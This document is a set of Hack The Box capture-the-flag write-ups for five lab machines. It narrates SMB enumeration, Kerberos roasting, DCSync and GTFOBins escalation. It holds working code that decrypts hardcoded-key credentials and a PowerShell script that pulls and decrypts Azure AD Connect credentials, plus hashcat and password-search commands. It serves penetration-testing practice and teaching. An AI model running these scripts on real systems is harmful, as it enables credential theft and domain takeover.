Nest

One of VBScripts boxes on windows focuses heavily on reversing applications to crack credentials.

Run Nmap

Only 445 is open? Lets run again with the -p- flag to confirm, feeling like another evil-winrm box.

Foothold Enumeration

Running a quick nmap scan for vulnerabilities doesn’t give us anything.

We get the hostname.

Enum4Linux doesn’t get us much, access is denied for most checks.

Smbclient gives us the directories so lets play around and see whats here.

We can access secure but not the actual files.

We don’t have access to any of the Users directories.

And SMBmap doesn’t give us anything to work with.

We switch to windows and map a drive to quickly run through it and we find the foothold credentials in the Data folder.

And we have our foothold with the TEMPUSER user.

User enumeration

We have greater access with tempuser so lets keep going through files.

In the Notepad++ config we can see C.Smith has a history file in \Secure$\

We cant list the IT folder but we know Carl\ exists..

We take a chance at trying to go to Carls directory and awesome we have some permissions to this directory.. lets see whats in here…

first few files are useless but it looks like carl has hardcoded some of his credentials for a VB program in RU_Config.xml.

We can see many Public Property Username/password references in different files but nothing we can use..

We find the RU_Config.xml file in the Data fileshare.

Sure enoughh we find the user and a hashed or encrypted password. None of the files we saw earlier had extra information for us but we did find some interesting vb files that seem relevant. We go through them and find some interesting cryptography functions;

Key pieces of information we will need are

    dim cipherText As String="fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
    dim passPhrase As String="N3st22"
    dim saltValue As String="88552299"
    dim passwordIterations AS INTEGER=2 
    dim initVector As String="464R5DFA5DL6LE28"
    dim keySize AS INTEGER=256

So we now have the information we need, we know how the tool encrypts and decrypts passwords and we have the hardcoded default salts etc. We build the below code in visual studio, using the RU-Scanner code as the base.

Imports System
Imports System.IO
Imports System.Text
Imports System.Security.Cryptography
Imports System.Text.Encoding
Imports Microsoft.VisualBasic
Module Program
    Sub Main()
        Dim cipherText As String = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
        Dim passPhrase As String = "N3st22"
        Dim saltValue As String = "88552299"
        Dim passwordIterations As Integer = 2
        Dim initVector As String = "464R5DFA5DL6LE28"
        Dim keySize As Integer = 256

        Dim initVectorBytes As Byte()
        initVectorBytes = System.Text.Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = System.Text.Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount)

        Print(plainText)
    End Sub
End Module

Running this we see the password as xRxRxPANCAK3SxRxRx

We have the user flag.

Enumerating User 2

Now we have user 2 lets go back to enumerating the SMB shares. SMB is still the only tool we can use, the box is fun but very CTFish.

Looks like there is a port open for HQK queries that our NMAP missed.

Running strings against the HQKLDAP.exe file we found doesn’t give us much information but when we disassemble it, we see the version is 1.2.0 but googling suggests this isn’t a real tool so we shouldn’t expect public exploits.

Decompiling the exe and going through the code doesn’t give us any answers.

Our Nmap scan on the port gives us feedback including commands we can post to the server on that port. Maybe telnet is the answer here?


So it looks like we have a simple interface with this service through telnet, We have an option to debug the service but will need a password to do so. Carls password isn’t helping us, so we go back to the empty text file we found and see if it has the password.

After poking around with the file we find a handy smb command, allinfo which shows us 2 streams, including 1 password stream with 15 bytes.

 We try to get this stream and we have potentially gotten a password; WBQ201953D8w . Lets try it with telnet first and if it isn’t accepted we will need to check the exe code to see what we need to do.

It is accepted. We have 3 new commands, Service, Session and ShowQuery.

So we can see some info for the queries but nothing that helps us, we also cannot leave the 1-3 range of the app.

We cant seem to run any of these queries.

We also cant navigate to the network location. Lets review the decompiled .exe we found in carls home directory again. We see a cryptography section in the code that mimics the functionality we used to get user but the method it uses, IV and salt etc are slightly different but even if we know how to decrypt this password and we still need to find the password hash.

After scratching our head for awhile we realise we can use the showquery, list and setdir commands to navigate around the application director and doing this we find the administrator credentials including an encrypted password= yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Decrypt
{
    class decrypt
    {
        static void Main(string[] args)
        {
            string cipherText = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=";
            string passPhrase = "667912";
            string saltValue = "1313Rf99";
            int passwordIterations = 3;
            string initVector = "1L1SA61493DRV53Z";
            int keySize = 256;

            byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
            byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
            byte[] buffer = Convert.FromBase64String(cipherText);
            byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked((int)Math.Round(unchecked((double)keySize / 8.0))));
            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
            cryptoServiceProvider.Mode = CipherMode.CBC;
            ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
            MemoryStream memoryStream = new MemoryStream(buffer);
            CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read);
            byte[] numArray = new byte[checked(buffer.Length + 1)];
            int count = cryptoStream.Read(numArray, 0, numArray.Length);
            memoryStream.Close();
            cryptoStream.Close();
            string v = Encoding.ASCII.GetString(numArray, 0, count);
            string plaintext = v;
            Console.WriteLine(v);
         }
    }
}

We put together this C# code using the decompiled source code as a base, and run it.

Success, password for admin is XtH4nkS4Pl4y1nGX.


We login with this credential and are able to get the key!

The big lessons learned here that cost me alot of time was firstly to enumerate all thing things and make note of findings that might not be used till later, and secondly to learn more about the applications i am using, even custom applications as that can help with enumeration.

Traverxec

This box is a mixture of CVEs, mis-configurations and GTFObins

Run Nmap

Quick scan shows us a webserver and ssh are open. We will run a more intensive scan to double check and get dirb running. We also see Nostromo 1.9.6 is the webserver running. While those scans run lets research this.

Run Dirb

Nostromo exploit

We see an RCE; https://www.exploit-db.com/exploits/47837 and https://git.sp0re.sh/sp0re/Nhttpd-exploits

Lets give CVE-2019-16278 a try.

We have rce! 😊 Lets try and get a shell before proceeding. Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md as a guide we try for a bash shell.

We setup a simple python webserver to host our shell.

We are able to upload our shell to /tmp

We run it

And we get shell! Time to move to user enumeration.

Enumerating for user

We see our target user David.

Going through the server bit by bit e see the Nostromo config file and this give us a lot of good info – the server admin name and the location of the password in .htpasswd.

We have the password hash – now lets crack it!

Running john on the hash gets us the password; Nowonly4me

We arnt able to ssh with these credentials so they must be for something else so lets keep looking.

Checking out the MAN page for nostromos, it looks like we can navigate to the home directories because of how the server is set up. lets try it

The web page itself gave us nothing and after tearing our hair out for several hours we try to cd directly to the directory.. and it works… ouch.

Going through the public_www folder we find a subdirectory that is quite interesting. It looks like we have an ssh key, lets unzip it and get Davids ssh cert.

We have issues running john to crack the password protected rsa key, after some googling we find a script that will run a dictionary attack against the file and we find the pasword to the private key is hunter. Lets try to ssh as David now.

We got user.txt and ssh access to David!

Enumerating to root.

Shortly after starting to explore David we find this shell script that lets us use sudo for the Journalctl command. Dusting off our trusty GTFOBins spellbook we find the incantation we need; https://gtfobins.github.io/gtfobins/journalctl/

After some playing around we were able to identify the correct place to enter the GTFOBin command and get a root shell. Happy days.

Interesting box, foothold and root was easy but user took ages to figure!

Monteverde

This is an interesting box that mixed lazy admins with the risks of cloud based authentication.

Run nmap

First time in HTB nmap says the host is down. Wonder if somebody has been messing with the box or its part of the challenge. Lets force Nmap to scan even with the box showing its down with -pN as a flag.

Interesting, they have TCPWrappers enabled. We can see that LDAP, SMB, DNS and Kerberos ports are open by looking at the port numbers but there is some obfuscation. As this seems to be a windows box lets enumerate with enum4linux and follow up findings with impacket and see if we can find a way in.

Enum4linux

Decent bit of information we now have users – including a juicy sounding SABatchJobs account, the domain and some groups. Maybe we should try some kerbroasting like we learned about with Sauna.

Kerberos enumeration

Reviewing the blog; https://www.tarlogic.com/en/blog/how-to-attack-kerberos/  and lets use kerbrute to confirm the usernames.

Impacket and kerbroasting seem to be a dead end, so lets try enumerating some more with SMB.

SMB enumeration.

We confirm SMB is running with CME and an additional nmap scan. We recently discovered a new pentesting tool called RPCClient which should give us a low privilege shell. Using this guide, we proceed; https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/

We find additional information on privileges and are able to drill down into the user accounts we found previously, we see only 3 accounts have logged in previously, lets focus on these as we know these are good.

SMB bruteforce

After playing around with these 3 usernames and running into issues with both MSF and CME. Trying rockyou as the password list didnt work for us until we started trying the usernames as password and found SABatchJobs password was SABatchjobs. Bighead would be proud.

We did spend about 3 hours trying to get smbclient to work, the quarantine and coffee shortages are having an impact on my life.. but luckily literally the first thing we checked has the second users password, mhope. I am a ball luck right now! 😊 When we ran cme for winrm we found it was open, so using evil-winrm, a tool we used in a previous HTB, we can try for shell.

Looks like we are successful.

And we have user.

Evil-Winrm enumeration

Starting to enumerate with winrm we check the services and see the big service is SQL running on this box and Azure ADConnect. We will need to enumerate with some scripts though

We upload PowerSploit, and Sherlock.

None of these tools give us anything to work with, box seems solid.

A friend reminds us the use the /all paramete for WhoAmI and it shows us that mhope is in the MEGABANK\Azure Admins group. This stands out as suspicious. But lets enumerate SQL server first as it seems more likely than azure.

Enumerating SQL Server

We can see this is SQL server so lets focus on that. Googling gives us an enum guide we will use as SQL Servers and us are not a good match 😮

Trying the use MSF to log in with mhope doesn’t work. Seems Mhope isnt allowed to access SQL. Going back to googling/researching what we found so far a wild blog suddenly appears that chains our two findings together; https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ Best of all VBScrub wrote it who is a very good hacker who always offers awesome advise on the HTB forums.

The exploit

We read through the original exploit VBScrub linked to; https://blog.xpnsec.com/azuread-connect-for-redteam/ and use his code to create a ps1 file, reading through the code, doesn’t seem to be anything we will need to change. But now lets upload it with winrm and execute.. lets see what happens.

We upload it as normal and when we run it evil winrm cuts out. We didnt think of this at the time but we should have loaded the module into Evil-WinRm but we didnt realise our mistake. We did notice it was showing the file being execute from my kali machine. Reading back over the blog we see that “you also need to make sure the mcrypt.dll from the download link is in the same directory the program is in.” we try this and try adding mcrypt.dll to our path, but neither is successful, keeps cutting out.

We decided to run the following code that we found line by line, its different to the above as it hardcodes the mcrypt.dll location;

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; 
Integrated Security = True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password

This is pretty awesome, we get the credentials.

And we are admin with the root.txt 🙂

OpenAdmin

Run NMAP

As always nmap is the first tool we use and we see only 2 ports open 22 and 80.. bleh it’s a website box ☹ hate webapp pentesting.

Run Dirb

Since its web app we run dirb and wfuzz to map out the site, the two tools let us see if we get anything different between the two. What we can see is this box is running 3 separate sites; art, music and tech websites. Given the name of the box im assuming this box is mimicking a multi-tenant hosting company and our way in will be the hosting providers admin page. But so far we haven’t found this so let try dirbuster with the medium list.

Dirbuster with the medium list shows an /ona/ directory which didnt appear in the previous tools – shows the importance of using multiple tools. This dir is how the site is managed, with a tool called OpenNetAdmin v18.1.1 which has an RCE related to it.

Run Nikto

While the dirbuster scan was running we ran Nikto just incase but unfortunately it is not our way in. Trying to fuzz the site also doesn’t work.

Check the services

Nikto did shows us that the apache version being run is out of date, so we will check vulnerabilities associated with that service. https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-241078/Apache-Http-Server-2.4.29.html

One vulnerability captures our eye; https://www.exploit-db.com/exploits/42745. But it is unlikely this is the way forward.

OpenNetAdmin seems the way to go with 2 potential exploits including a msf Command injection exploit. Lets see if it works.

It doesn’t work for us. Interesting.

Downloading the script from exploitDB and loading it into msf manually also doesn’t work. So lets try the other script searchsploit pointed us to.

This one works to give is a basic shell. Basic commands work so lets enumerate what we can. Cat all the things 😊

So it looks like we use the DCM cli to run sql commands maybe; https://github.com/opennetadmin/dcm

Alas DCM failed us, we couldn’t run sql commands through it but we did findund the sql username in /var/log/ona.log .. lets enum some more.

After much searching we find the db login and password in one of the sub directories of where our shell started in – n1nj4W4rri0R! . Never forget to check whats close to home i guess.

We also have two users.. lets try the db password on the user accounts and see if we can ssh.

And with have jimmy, to the sound of applause!

A friend introduced us to a linux enum script we want to try; https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

LinEnum.sh goes through a massive amount of enum and gives some great information but here, for this box – there are no interesting findings.

When checking out the /var/www location we find a separate “internal” web page. Lets check out these files

We can see jimmy’s hashed password is stored in the index.php file but not Joanna’s, Joanna seems to use a key which is cat’d to the output in main.php.

We can see joanna’s ssh key will be cat’d to us if we run main.php but we don’t seem to have the permissions to run it from php, by checking out apaches config we can see Internal is an enabled-site with the server name internal.openadmin.htb. So lets curl the server name instead of the ip. Curling the hostname didn’t work for us.

But by re-reading the config file we see its listening on a particular localhost:port , when we curl this we get our RSA priv key.

We can see that the RSA key is encrypted with a pass phrase. We try using jimmys password, due to the ninja hint in the webpage, but it doesnt work. We can see there passphrase is breakable by checking the header; DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6. Using SSH2John format to convert the file to a john crackable format, we get the passphrase, bloodninjas. This is the same process we did for Postman.

Now we are in for Joanna and we have the user flag.

Checking the sudo -l we can see Joanna can execute a particular file as root using nano. A friend recently introduced us to GTFOBins which are ways to abuse this type of privilege. Lets use the nano file to break out of the restricted shell as per here; https://gtfobins.github.io/gtfobins/nano/#shell

Sure enough running sudo /bin/nano /opt/priv and using the gtfobin saves our bacon and we get the root flag.

Happy days we have evolved into a script kiddy 🙂

Sauna

Run nmap.

Review interesting findings

  • 9389/tcp – Active directory web services
  • 445/139/tcp – SMB ports lets run smbmapper
  • 80/tcp – web server – lets run dirb on it.
  • 3268/tcp – LDAP requests sent to port 3268 can be used to search for objects in the entire forest for the global catalog
  • 464/tcp – kpasswd – A vulnerability has been reported in Kerberos, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to the kpasswd application not properly handling malformed UDP packets and can be exploited to exhaust CPU and network resources via the UDP “ping-pong” attack on port 464.
    References: [CVE-2002-2443], [SECUNIA-53375]
  • 389/tcp – LDAP
  • 593/tcp – MS Security Bulletin [MS03-026] outlines a critical Buffer Overrun RPC vulnerability that can be exploited via ports 135, 139, 445, 593 (or any other specifically configured RPC port). You should filter the above mentioned ports at the firewall level and not allow RPC over an unsecure network, such as the Internet.
  • 135/tcp – Remote Procedure Call (RPC) 
  • 88/tcp – KDC (Kerberos key distribution center) server.
  • 5985/tcp – WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default.

We can see many interesting ports to look at – the box seems to be LDAP/AD/Kerberos focused. We also see we get an nmap segmentation fault;

Checking the services

SMBmap doesn’t give us much to work with here.

Not much shown from dirb either, looks like a pretty flat site. We have a lot of other choices to check but lets spin up sparta to try and narrow down our options before we take the next step with the AD/LDAP/Kerberos enumeration. Lets see if it gives us alternative options.

While sparta is running we will also setup openvas on our machine using the guide here -https://hackertarget.com/install-openvas-gvm-on-kali/ ;

root@kali:~# apt update
root@kali:~# apt install openvas
root@kali:~# openvas-setup
kali:~# greenbone-scapdata-sync
root@kali:~# openvas-adduser
root@kali:~# gsd
[*] Creating admin user
User created with password '73a95e20-b3fd-4e77-9b6f-247a49ff695e'.

While these scans run we read up on Kerberos here; https://www.tarlogic.com/en/blog/how-kerberos-works/ this blog leads us to an interesting attack which matches the boxes name; https://attack.mitre.org/techniques/T1208/ KerbeRoasting but we need a domain account to do this. So lets try and get one with some further enumeration.

A good amount of information, usernames, including guest. Plus the domain name. Going back to the site itself we found some usernames;

We can also see many blog posts from user Admin. Finally using cme we can find some additional information.

Vulnerability Detection Result

Here is the list of DCE/RPC or MSRPC services running on this host via the TCP protocol:
Port: 49664/tcp
     UUID: d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49664]
Port: 49665/tcp
     UUID: f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49665]
     Annotation: Event log TCPIP
Port: 49666/tcp
     UUID: 3a9ef155-691d-4449-8d05-09ad57031823, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49666]
     UUID: 86d35949-83c9-4044-b424-db363231fd0c, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49666]
Port: 49667/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: 12345778-1234-abcd-ef00-0123456789ac, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : SAM access
     UUID: c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: Impl friendly name
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_ip_tcp:10.10.10.175[49667]
     Annotation: MS NT Directory DRS Interface
Port: 49673/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_http:10.10.10.175[49673]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_http:10.10.10.175[49673]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_http:10.10.10.175[49673]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_http:10.10.10.175[49673]
     Annotation: MS NT Directory DRS Interface
Port: 49674/tcp
     UUID: 0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Annotation: RemoteAccessCheck
     UUID: 12345678-1234-abcd-ef00-01234567cffb, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : Netlogon
     Description : Net Logon service
     UUID: 12345778-1234-abcd-ef00-0123456789ab, version 0
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : LSA access
     UUID: 12345778-1234-abcd-ef00-0123456789ac, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Named pipe : lsass
     Win32 service or process : lsass.exe
     Description : SAM access
     UUID: e3514235-4b06-11d1-ab04-00c04fc2dcd2, version 4
     Endpoint: ncacn_ip_tcp:10.10.10.175[49674]
     Annotation: MS NT Directory DRS Interface
Port: 49675/tcp
     UUID: 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: 12345678-1234-abcd-ef00-0123456789ab, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     Named pipe : spoolss
     Win32 service or process : spoolsv.exe
     Description : Spooler service
     UUID: 4a452661-8290-4b36-8fbe-7f4093a94978, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: 76f03f96-cdfd-44fc-a22c-64950a001209, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
     UUID: ae33069b-a2a8-46ee-a235-ddfd339be281, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49675]
Port: 49678/tcp
     UUID: 367abb81-9844-35f1-ad32-98f038001003, version 2
     Endpoint: ncacn_ip_tcp:10.10.10.175[49678]
Port: 49686/tcp
     UUID: 50abc2a4-574d-40b3-9d66-ee4fd5fba076, version 5
     Endpoint: ncacn_ip_tcp:10.10.10.175[49686]
     Named pipe : dnsserver
     Win32 service or process : dns.exe
     Description : DNS Server
Port: 49696/tcp
     UUID: 897e2e5f-93f3-4376-9c9c-fd2277495c27, version 1
     Endpoint: ncacn_ip_tcp:10.10.10.175[49696]
     Annotation: Frs2 Service

CME doesn’t show us much and our OpenVAS scan hasn’t given us any vulnerabilities to exploit, though we did get additional enumeration information. But I think this is the extent of the info we will get so lets start trying to get in using https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ and https://pentestlab.blog/2018/06/04/spn-discovery/

We will need a valid user so we create a user list using cewl and edit it to include the users above, in different standard employee formats. Ever wonder why your employer doesn’t just use $Firstname.$lastname? Now you know!

Foothold

Initial foothold shows we are using the wrong domain, to the glee of a friend who is getting into the habit of saying stop being stooopid.

Interestingly it looks like fsmith is a user and we now have there hash. Bouncing back to the blogs we are able to move along this chain to crack this hash. Using hashcat we run;

hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt

With that we have the password and the SPN for

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 00:54:34.140321  <never>               

HSmith is showing instead of fsmith interestingly. I need to read up more on SPNs though it probably wont be needed for this box. Microsoft has some good documentation here; https://docs.microsoft.com/en-us/windows/win32/ad/service-principal-names

A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.

It looks like hsmith will be the service account we will be targeting. Initially we were getting an error when trying to run this command “[-] SPN:  – Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)” but after doing an ntpupdate 10.10.10.175 we fixed this. Running the command above again we get the hash and now we just need to.. ah roast it.

We crack it successfully but the password is Thestrokes23.. same as for fsmith, maybe this was a false positive. Lets log in.

Looks like we can smb login as hsmith and fsmith.

We see a RICOH printer drive which is interesting but there doesnt seem to be any vulnerabilities we can use. Going back over the nmap results we see winrm running on this server on its default port, so lets try Evil-Winrm to see if we can get a shell with these users. We use this guide to setup Evil-Winrm – https://github.com/Hackplayers/evil-winrm

Bingo! We have access for FSmith, but we cant access winrm from hsmith. So lets try some enumeration to get root, bloodhound might be good here. Using ireds tutorial we setup bloodhound; https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

While this is being set up we enumerate some more.

 We can see a svc account is available.. we will try to kerberoast it.

Doesn’t work so let enumerate some more;

Some good information. We alse run these commands from C:\

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

We get a lot of results but nothing seems relevant. After a while we find a blog with additional enumeration steps; https://pentestlab.blog/2017/04/19/stored-credentials/ ;

I am not associated with https://pentestlab.blog/ but I owe her so many beers by now.

DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
DefaultPassword    REG_SZ    Moneymakestheworldgoround!

We now have User 1, and User 2 but how do we get root… Lets go over our enumeration with impactet and these new user credentials.

We have a ticket granting ticket. Lets kerberoast the service account incase we get something new. But we don’t.

Sadly this isn’t helping us. So lets go back to enumeration, we have a domain account so let use bloodhound to enumeration all things AD;

Going through the information generated we see Unconstrained delegation is enabled, allowing for this attack; https://blog.stealthbits.com/unconstrained-delegation-permissions/ this might help us. Unfortunately it doesn’t.

But the information from just FSmiths account is limited, so lets login as svc_loanmgr and see what information we get.

After spending some time navigating bloodhound, as nice as having a gui is for the point-click admins, I hate it – but after much searching, blood, sweat and sanity I finally see that svc_loanmgr has both getchanges and getchangesall privileges allowing for a DCSync attack.

We will attack it using the impacket tool secretsdump.py, described in the blog https://spookysec.net/2019-12-01-domain-controller-sync/ (sent our way by a friend who stops us being stoopid).

From here we just need to use the hash with evil-rm as administrator to get the flag.

Game set and match, but in saying that I was working on this on-off for about 4 days before it clicked, strangely it was the seeing the vulnerability in bloodhound that I had the most trouble with, which if you go by the comments in the HTB forums was the easy bit! 😀

Such is life.